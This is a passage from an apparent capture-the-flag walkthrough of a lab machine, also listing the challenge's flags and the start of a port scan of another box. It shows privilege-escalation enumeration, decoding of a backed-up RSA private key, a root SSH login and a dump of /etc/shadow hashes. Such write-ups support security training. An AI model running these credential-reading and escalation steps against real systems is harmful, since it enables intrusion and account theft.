/home/will/.config/lxc
/home/will/.config/lxc/config.yml
/home/will/.config/lxc/cookies
/home/will/flag_6.txt
/home/will/.gnupg
/home/will/.gnupg/private-keys-v1.d
/home/will/.profile
/home/will/.sudo_as_admin_successful
/run/lock
/run/screen
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linpeas.sh
/tmp/.Test-unix
/tmp/tmux-1000
#)You_can_write_even_more_files_inside_last_directory

/var/crash
/var/lib/lxcfs/cgroup/memory/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/lxc/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/lxc/ignite/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/amazon-ssm-agent.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apache2.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/boot.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxd.socket/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/networkd-dispatcher.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/polkit.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.socket/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-resolved.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-lvm2x2dpvscan.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-serialx2dgetty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/vsftpd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
/var/lib/php/sessions
/var/tmp

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
  Group will:
/home/will/.config/lxc/config.yml
  Group adm:
/opt/backups
/opt/backups/key.b64

╔══════════╣ Searching passwords in history files

╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/bin/systemd-ask-password
/bin/systemd-tty-ask-password-agent
/etc/pam.d/common-password
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
  #)There are more creds/passwds files in the previous parent folder

/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/python3/dist-packages/cloudinit/config/cc_set_passwords.py
/usr/lib/python3/dist-packages/cloudinit/config/__pycache__/cc_set_passwords.cpython-36.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-36.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-36.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-36.pyc
/usr/share/dns/root.key
/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/man/man1/git-credential.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-store.1.gz
  #)There are more creds/passwds files in the previous parent folder

/usr/share/man/man7/gitcredentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
  #)There are more creds/passwds files in the previous parent folder

/usr/share/pam/common-password.md5sums
/usr/share/ubuntu-advantage-tools/modules/credentials.sh
/var/cache/debconf/passwords.dat
/var/lib/cloud/instances/iid-datasource-none/sem/config_set_passwords
/var/lib/lxd/server.key
/var/lib/pam/password

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Searching passwords inside logs (limit 70)
2020-08-06 22:35:30 install base-passwd:amd64 <none> 3.5.44
2020-08-06 22:35:30 status half-installed base-passwd:amd64 3.5.44
2020-08-06 22:35:31 configure base-passwd:amd64 3.5.44 3.5.44
2020-08-06 22:35:31 status half-configured base-passwd:amd64 3.5.44
2020-08-06 22:35:31 status unpacked base-passwd:amd64 3.5.44
2020-08-06 22:35:32 status installed base-passwd:amd64 3.5.44
2020-08-06 22:35:38 status half-configured base-passwd:amd64 3.5.44
2020-08-06 22:35:38 status half-installed base-passwd:amd64 3.5.44
2020-08-06 22:35:38 status unpacked base-passwd:amd64 3.5.44
2020-08-06 22:35:38 upgrade base-passwd:amd64 3.5.44 3.5.44
2020-08-06 22:35:44 install passwd:amd64 <none> 1:4.5-1ubuntu1
2020-08-06 22:35:44 status half-installed passwd:amd64 1:4.5-1ubuntu1
2020-08-06 22:35:44 status unpacked passwd:amd64 1:4.5-1ubuntu1
2020-08-06 22:35:45 configure base-passwd:amd64 3.5.44 <none>
2020-08-06 22:35:45 status half-configured base-passwd:amd64 3.5.44
2020-08-06 22:35:45 status installed base-passwd:amd64 3.5.44
2020-08-06 22:35:45 status unpacked base-passwd:amd64 3.5.44
2020-08-06 22:35:46 configure passwd:amd64 1:4.5-1ubuntu1 <none>
2020-08-06 22:35:46 status half-configured passwd:amd64 1:4.5-1ubuntu1
2020-08-06 22:35:46 status installed passwd:amd64 1:4.5-1ubuntu1
2020-08-06 22:35:46 status unpacked passwd:amd64 1:4.5-1ubuntu1
2020-08-06 22:37:45 configure passwd:amd64 1:4.5-1ubuntu2 <none>
2020-08-06 22:37:45 status half-configured passwd:amd64 1:4.5-1ubuntu1
2020-08-06 22:37:45 status half-configured passwd:amd64 1:4.5-1ubuntu2
2020-08-06 22:37:45 status half-installed passwd:amd64 1:4.5-1ubuntu1
2020-08-06 22:37:45 status installed passwd:amd64 1:4.5-1ubuntu2
2020-08-06 22:37:45 status unpacked passwd:amd64 1:4.5-1ubuntu1
2020-08-06 22:37:45 status unpacked passwd:amd64 1:4.5-1ubuntu2
2020-08-06 22:37:45 upgrade passwd:amd64 1:4.5-1ubuntu1 1:4.5-1ubuntu2
2020-12-03 01:34:42,245 - util.py[DEBUG]: Writing to /var/lib/cloud/instances/iid-datasource-none/sem/config_set_passwords - wb: [644] 25 bytes
2020-12-03 01:34:42,246 - ssh_util.py[DEBUG]: line 123: option PasswordAuthentication added with yes
2020-12-03 01:34:42,305 - cc_set_passwords.py[DEBUG]: Restarted the SSH daemon.
2020-12-03 01:34:42,305 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords ran successfully
2020-12-03 01:35:23,988 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2020-12-03 01:35:23,988 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2020-12-03 02:11:13,408 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2020-12-03 02:11:13,408 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2020-12-03 02:15:26,570 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2020-12-03 02:15:26,570 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2020-12-03 02:28:34,504 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2020-12-03 02:28:34,504 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2020-12-03 02:38:54,645 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2020-12-03 02:38:54,645 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2020-12-03 03:25:19,195 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2020-12-03 03:25:19,195 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2020-12-03 21:29:46,919 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2020-12-03 21:29:46,919 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2020-12-12 15:21:21,996 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2020-12-12 15:21:21,996 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2020-12-12 15:52:17,126 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2020-12-12 15:52:17,126 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
2023-03-15 21:20:15,502 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran
2023-03-15 21:20:15,502 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
 base-passwd depends on libc6 (>= 2.8); however:
 base-passwd depends on libdebconfclient0 (>= 0.145); however:
Binary file /var/log/journal/ec6c05333ff74080b8bd26a785d12724/system@0005b585ee67923d-9c5fd83b91fe8512.journal~ matches
Binary file /var/log/journal/ec6c05333ff74080b8bd26a785d12724/system.journal matches
Binary file /var/log/journal/ec6c05333ff74080b8bd26a785d12724/user-1000.journal matches
Binary file /var/log/journal/ec6c05333ff74080b8bd26a785d12724/user-1002.journal matches
Dec 03 01:31:11 ubuntu-server chage[14591]: changed password expiry for sshd
Dec 03 01:31:11 ubuntu-server usermod[14586]: change user 'sshd' password
Dec 12 15:21:16 watcher kernel: [    6.839382] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Dec 12 15:21:16 watcher systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Dec 12 15:22:41 watcher sshd[2566]: Accepted password for will from 192.168.153.128 port 37134 ssh2
Dec 12 15:52:14 watcher kernel: [    9.796182] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Dec 12 15:52:14 watcher sudo:     root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/touch /var/log/aws114_ssm_agent_installation.log
Dec 12 15:52:14 watcher systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Dec  3 01:34:39 watcher systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Dec  3 01:35:22 watcher kernel: [    4.333882] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Dec  3 01:38:37 watcher sshd[1296]: Accepted password for will from 192.168.153.128 port 55674 ssh2



                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
                                ╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r' 


will@watcher:/tmp$ cd /opt/backups/
cd /opt/backups/
will@watcher:/opt/backups$ ls
ls
key.b64
will@watcher:/opt/backups$ cat key.b64
cat key.b64
LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBelBhUUZvbFFx
OGNIb205bXNzeVBaNTNhTHpCY1J5QncrcnlzSjNoMEpDeG5WK2FHCm9wWmRjUXowMVlPWWRqWUlh
WkVKbWRjUFZXUXAvTDB1YzV1M2lnb2lLMXVpWU1mdzg1ME43dDNPWC9lcmRLRjQKanFWdTNpWE45
ZG9CbXIzVHVVOVJKa1ZuRER1bzh5NER0SXVGQ2Y5MlpmRUFKR1VCMit2Rk9ON3E0S0pzSXhnQQpu
TThrajhOa0ZrRlBrMGQxSEtIMitwN1FQMkhHWnJmM0RORm1RN1R1amEzem5nYkVWTzdOWHgzVjNZ
T0Y5eTFYCmVGUHJ2dERRVjdCWWI2ZWdrbGFmczRtNFhlVU8vY3NNODRJNm5ZSFd6RUo1enBjU3Jw
bWtESHhDOHlIOW1JVnQKZFNlbGFiVzJmdUxBaTUxVVIvMndOcUwxM2h2R2dscGVQaEtRZ1FJREFR
QUJBb0lCQUhtZ1RyeXcyMmcwQVRuSQo5WjVnZVRDNW9VR2padjdtSjJVREZQMlBJd3hjTlM4YUl3
YlVSN3JRUDNGOFY3cStNWnZEYjNrVS80cGlsKy9jCnEzWDdENTBnaWtwRVpFVWVJTVBQalBjVU5H
VUthWG9hWDVuMlhhWUJ0UWlSUjZaMXd2QVNPMHVFbjdQSXEyY3oKQlF2Y1J5UTVyaDZzTnJOaUpR
cEdESkRFNTRoSWlnaWMvR3VjYnluZXpZeWE4cnJJc2RXTS8wU1VsOUprbkkwUQpUUU9pL1gyd2Z5
cnlKc20rdFljdlk0eWRoQ2hLKzBuVlRoZWNpVXJWL3drRnZPRGJHTVN1dWhjSFJLVEtjNkI2CjF3
c1VBODUrdnFORnJ4ekZZL3RXMTg4VzAwZ3k5dzUxYktTS0R4Ym90aTJnZGdtRm9scG5Gdyt0MFFS
QjVSQ0YKQWxRSjI4a0NnWUVBNmxyWTJ4eWVMaC9hT0J1OStTcDN1SmtuSWtPYnBJV0NkTGQxeFhO
dERNQXo0T3FickxCNQpmSi9pVWNZandPQkh0M05Oa3VVbTZxb0VmcDRHb3UxNHlHek9pUmtBZTRI
UUpGOXZ4RldKNW1YK0JIR0kvdmoyCk52MXNxN1BhSUtxNHBrUkJ6UjZNL09iRDd5UWU3OE5kbFF2
TG5RVGxXcDRuamhqUW9IT3NvdnNDZ1lFQTMrVEUKN1FSNzd5UThsMWlHQUZZUlhJekJncDVlSjJB
QXZWcFdKdUlOTEs1bG1RL0UxeDJLOThFNzNDcFFzUkRHMG4rMQp2cDQrWThKMElCL3RHbUNmN0lQ
TWVpWDgwWUpXN0x0b3pyNytzZmJBUVoxVGEybzFoQ2FsQVF5SWs5cCtFWHBJClViQlZueVVDMVhj
dlJmUXZGSnl6Z2Njd0V4RXI2Z2xKS09qNjRiTUNnWUVBbHhteC9qeEtaTFRXenh4YjlWNEQKU1Bz
K055SmVKTXFNSFZMNFZUR2gydm5GdVR1cTJjSUM0bTUzem4reEo3ZXpwYjFyQTg1SnREMmduajZu
U3I5UQpBL0hiakp1Wkt3aTh1ZWJxdWl6b3Q2dUZCenBvdVBTdVV6QThzOHhIVkk2ZWRWMUhDOGlw
NEptdE5QQVdIa0xaCmdMTFZPazBnejdkdkMzaEdjMTJCcnFjQ2dZQWhGamkzNGlMQ2kzTmMxbHN2
TDRqdlNXbkxlTVhuUWJ1NlArQmQKYktpUHd0SUcxWnE4UTRSbTZxcUM5Y25vOE5iQkF0aUQ2L1RD
WDFrejZpUHE4djZQUUViMmdpaWplWVNKQllVTwprSkVwRVpNRjMwOFZuNk42L1E4RFlhdkpWYyt0
bTRtV2NOMm1ZQnpVR1FIbWI1aUpqa0xFMmYvVHdZVGcyREIwCm1FR0RHd0tCZ1FDaCtVcG1UVFJ4
NEtLTnk2d0prd0d2MnVSZGo5cnRhMlg1cHpUcTJuRUFwa2UyVVlsUDVPTGgKLzZLSFRMUmhjcDlG
bUY5aUtXRHRFTVNROERDYW41Wk1KN09JWXAyUloxUnpDOUR1ZzNxa3R0a09LQWJjY0tuNQo0QVB4
STFEeFUrYTJ4WFhmMDJkc1FIMEg1QWhOQ2lUQkQ3STVZUnNNMWJPRXFqRmRaZ3Y2U0E9PQotLS0t
LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=

┌──(witty㉿kali)-[~/Downloads]
└─$ echo "....                                                                           
TWVpWDgwWUpXN0x0b3pyNytzZmJBUVoxVGEybzFoQ2FsQVF5SWs5cCtFWHBJClViQlZueVVDMVhj
dlJmUXZGSnl6Z2Njd0V4RXI2Z2xKS09qNjRiTUNnWUVBbHhteC9qeEtaTFRXenh4YjlWNEQKU1Bz
K055SmVKTXFNSFZMNFZUR2gydm5GdVR1cTJjSUM0bTUzem4reEo3ZXpwYjFyQTg1SnREMmduajZu
U3I5UQpBL0hiakp1Wkt3aTh1ZWJxdWl6b3Q2dUZCenBvdVBTdVV6QThzOHhIVkk2ZWRWMUhDOGlw
NEptdE5QQVdIa0xaCmdMTFZPazBnejdkdkMzaEdjMTJCcnFjQ2dZQWhGamkzNGlMQ2kzTmMxbHN2
TDRqdlNXbkxlTVhuUWJ1NlArQmQKYktpUHd0SUcxWnE4UTRSbTZxcUM5Y25vOE5iQkF0aUQ2L1RD
WDFrejZpUHE4djZQUUViMmdpaWplWVNKQllVTwprSkVwRVpNRjMwOFZuNk42L1E4RFlhdkpWYyt0
bTRtV2NOMm1ZQnpVR1FIbWI1aUpqa0xFMmYvVHdZVGcyREIwCm1FR0RHd0tCZ1FDaCtVcG1UVFJ4
NEtLTnk2d0prd0d2MnVSZGo5cnRhMlg1cHpUcTJuRUFwa2UyVVlsUDVPTGgKLzZLSFRMUmhjcDlG
bUY5aUtXRHRFTVNROERDYW41Wk1KN09JWXAyUloxUnpDOUR1ZzNxa3R0a09LQWJjY0tuNQo0QVB4
STFEeFUrYTJ4WFhmMDJkc1FIMEg1QWhOQ2lUQkQ3STVZUnNNMWJPRXFqRmRaZ3Y2U0E9PQotLS0t
LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=" | base64 -d

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAzPaQFolQq8cHom9mssyPZ53aLzBcRyBw+rysJ3h0JCxnV+aG
opZdcQz01YOYdjYIaZEJmdcPVWQp/L0uc5u3igoiK1uiYMfw850N7t3OX/erdKF4
jqVu3iXN9doBmr3TuU9RJkVnDDuo8y4DtIuFCf92ZfEAJGUB2+vFON7q4KJsIxgA
nM8kj8NkFkFPk0d1HKH2+p7QP2HGZrf3DNFmQ7Tuja3zngbEVO7NXx3V3YOF9y1X
eFPrvtDQV7BYb6egklafs4m4XeUO/csM84I6nYHWzEJ5zpcSrpmkDHxC8yH9mIVt
dSelabW2fuLAi51UR/2wNqL13hvGglpePhKQgQIDAQABAoIBAHmgTryw22g0ATnI
9Z5geTC5oUGjZv7mJ2UDFP2PIwxcNS8aIwbUR7rQP3F8V7q+MZvDb3kU/4pil+/c
q3X7D50gikpEZEUeIMPPjPcUNGUKaXoaX5n2XaYBtQiRR6Z1wvASO0uEn7PIq2cz
BQvcRyQ5rh6sNrNiJQpGDJDE54hIigic/GucbynezYya8rrIsdWM/0SUl9JknI0Q
TQOi/X2wfyryJsm+tYcvY4ydhChK+0nVTheciUrV/wkFvODbGMSuuhcHRKTKc6B6
1wsUA85+vqNFrxzFY/tW188W00gy9w51bKSKDxboti2gdgmFolpnFw+t0QRB5RCF
AlQJ28kCgYEA6lrY2xyeLh/aOBu9+Sp3uJknIkObpIWCdLd1xXNtDMAz4OqbrLB5
fJ/iUcYjwOBHt3NNkuUm6qoEfp4Gou14yGzOiRkAe4HQJF9vxFWJ5mX+BHGI/vj2
Nv1sq7PaIKq4pkRBzR6M/ObD7yQe78NdlQvLnQTlWp4njhjQoHOsovsCgYEA3+TE
7QR77yQ8l1iGAFYRXIzBgp5eJ2AAvVpWJuINLK5lmQ/E1x2K98E73CpQsRDG0n+1
vp4+Y8J0IB/tGmCf7IPMeiX80YJW7Ltozr7+sfbAQZ1Ta2o1hCalAQyIk9p+EXpI
UbBVnyUC1XcvRfQvFJyzgccwExEr6glJKOj64bMCgYEAlxmx/jxKZLTWzxxb9V4D
SPs+NyJeJMqMHVL4VTGh2vnFuTuq2cIC4m53zn+xJ7ezpb1rA85JtD2gnj6nSr9Q
A/HbjJuZKwi8uebquizot6uFBzpouPSuUzA8s8xHVI6edV1HC8ip4JmtNPAWHkLZ
gLLVOk0gz7dvC3hGc12BrqcCgYAhFji34iLCi3Nc1lsvL4jvSWnLeMXnQbu6P+Bd
bKiPwtIG1Zq8Q4Rm6qqC9cno8NbBAtiD6/TCX1kz6iPq8v6PQEb2giijeYSJBYUO
kJEpEZMF308Vn6N6/Q8DYavJVc+tm4mWcN2mYBzUGQHmb5iJjkLE2f/TwYTg2DB0
mEGDGwKBgQCh+UpmTTRx4KKNy6wJkwGv2uRdj9rta2X5pzTq2nEApke2UYlP5OLh
/6KHTLRhcp9FmF9iKWDtEMSQ8DCan5ZMJ7OIYp2RZ1RzC9Dug3qkttkOKAbccKn5
4APxI1DxU+a2xXXf02dsQH0H5AhNCiTBD7I5YRsM1bOEqjFdZgv6SA==
-----END RSA PRIVATE KEY-----

┌──(witty㉿kali)-[~/Downloads]
└─$ nano will_idrsa
                                                                                    
┌──(witty㉿kali)-[~/Downloads]
└─$ chmod 600 will_idrsa    
                                                                                    
┌──(witty㉿kali)-[~/Downloads]
└─$ ssh -i will_idrsa root@10.10.46.15            
The authenticity of host '10.10.46.15 (10.10.46.15)' can't be established.
ED25519 key fingerprint is SHA256:/60sf9gTocupkmAaJjtQJTxW1ZnolBZckE6KpPiQi5s.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.46.15' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 1.0


33 packages can be updated.
0 updates are security updates.


Last login: Thu Dec  3 03:25:38 2020
root@watcher:~# ls
flag_7.txt
root@watcher:~# cat flag_7.txt
FLAG{who_watches_the_watchers}
root@watcher:~# ls -lah
total 40K
drwx------  6 root root 4.0K Dec  3  2020 .
drwxr-xr-x 24 root root 4.0K Dec 12  2020 ..
lrwxrwxrwx  1 root root    9 Dec  3  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwx------  2 root root 4.0K Dec  3  2020 .cache
-rw-r--r--  1 root root   31 Dec  3  2020 flag_7.txt
drwx------  3 root root 4.0K Dec  3  2020 .gnupg
drwxr-xr-x  3 root root 4.0K Dec  3  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Dec  3  2020 .selected_editor
drwx------  2 root root 4.0K Dec  3  2020 .ssh
root@watcher:~# cat .bash_history
root@watcher:~# cat /etc/shadow
root:$6$UseANeHi$f02vVBMbk9b5LRepJhjdhquXMJ6aBOi1IwQ3EJqF.dbhC0XCNDcZ4kmCVxR.3vNKr4ol0HzTIYXR6ATpYjDwJ1:18599:0:99999:7:::
daemon:*:18480:0:99999:7:::
bin:*:18480:0:99999:7:::
sys:*:18480:0:99999:7:::
sync:*:18480:0:99999:7:::
games:*:18480:0:99999:7:::
man:*:18480:0:99999:7:::
lp:*:18480:0:99999:7:::
mail:*:18480:0:99999:7:::
news:*:18480:0:99999:7:::
uucp:*:18480:0:99999:7:::
proxy:*:18480:0:99999:7:::
www-data:*:18480:0:99999:7:::
backup:*:18480:0:99999:7:::
list:*:18480:0:99999:7:::
irc:*:18480:0:99999:7:::
gnats:*:18480:0:99999:7:::
nobody:*:18480:0:99999:7:::
systemd-network:*:18480:0:99999:7:::
systemd-resolve:*:18480:0:99999:7:::
syslog:*:18480:0:99999:7:::
messagebus:*:18480:0:99999:7:::
_apt:*:18480:0:99999:7:::
lxd:*:18480:0:99999:7:::
uuidd:*:18480:0:99999:7:::
dnsmasq:*:18480:0:99999:7:::
landscape:*:18480:0:99999:7:::
pollinate:*:18480:0:99999:7:::
sshd:*:18599:0:99999:7:::
will:$6$PMxyf2rOO/k.yQyc$o5EbluoIAvLUeOivGTHqx6opAGuHit2d8wBWtFD7xWyJBTt680a/7917Wcg6fi83ubwnFhWFlPmYJjRKWwp0m.:18599:0:99999:7:::
ftp:*:18599:0:99999:7:::
ftpuser:$6$ag2r/3kP$9N1nbsh10Vb0WFHXGza.fnWNjbiPGiuYZ2nRGiq3/cR1SDPCyVi9GSrgeYBP/9wfzsFvRsIL3cJIsFUCL1741.:18599:0:99999:7:::
mat:$6$yCP235ym$3EE8j2pgbseXTOvIOA23rWHGzO3UesHWdOUoesyJFpCkHmUwspwyPtbxUCvfuba8yi69LrYIMJnyUjJ07M1M21:18599:0:99999:7:::
toby:$6$c9ZzrH1h$KII6cn/29vuk2cSxA5HC56UJ9BfRhmIDapaB2Bpkb7LATFQtVThblvo5f8Po2FmODE0a4pBcC7SNxlYnFkXO8.:18599:0:99999:7:::

Flag 1

https://moz.com/learn/seo/robotstxt

FLAG{robots_dot_text_what_is_next}

Flag 2

https://www.netsparker.com/blog/web-security/local-file-inclusion-vulnerability/

FLAG{ftp_you_and_me}

Flag 3

https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2

FLAG{lfi_what_a_guy}

Flag 4

https://www.explainshell.com/explain?cmd=sudo+-l

FLAG{chad_lifestyle}

Flag 5

https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs

FLAG{live_by_the_cow_die_by_the_cow}

Flag 6

https://book.hacktricks.xyz/linux-unix/privilege-escalation#python-library-hijacking

FLAG{but_i_thought_my_script_was_secure}

Flag 7

https://explainshell.com/explain?cmd=ssh%20-i%20keyfile%20host

FLAG{who_watches_the_watchers}

[[CMesS]]

PrevioushackerNote NextCMesS

Last updated 2 years ago

Was this helpful?

┌──(witty㉿kali)-[~/Downloads] └─$ rustscan -a 10.10.202.105 --ulimit 5500 -b 65535 -- -A -Pn .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- 🌍HACK THE PLANET🌍 [~] The config file is expected to be at "/home/witty/.rustscan.toml" [~] Automatically increasing ulimit value to 5500. [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers Open 10.10.202.105:22 Open 10.10.202.105:21 Open 10.10.202.105:80 [~] Starting Script(s) [>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}") Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. [~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 14:01 EDT NSE: Loaded 155 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 14:01 Completed NSE at 14:01, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 14:01 Completed NSE at 14:01, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 14:01 Completed NSE at 14:01, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 14:01 Completed Parallel DNS resolution of 1 host. at 14:01, 0.02s elapsed DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating Connect Scan at 14:01 Scanning 10.10.202.105 [3 ports] Discovered open port 80/tcp on 10.10.202.105 Discovered open port 21/tcp on 10.10.202.105 Discovered open port 22/tcp on 10.10.202.105 Completed Connect Scan at 14:01, 0.24s elapsed (3 total ports) Initiating Service scan at 14:01 Scanning 3 services on 10.10.202.105 Completed Service scan at 14:01, 7.00s elapsed (3 services on 1 host) NSE: Script scanning 10.10.202.105. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 14:01 Completed NSE at 14:01, 12.47s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 14:01 Completed 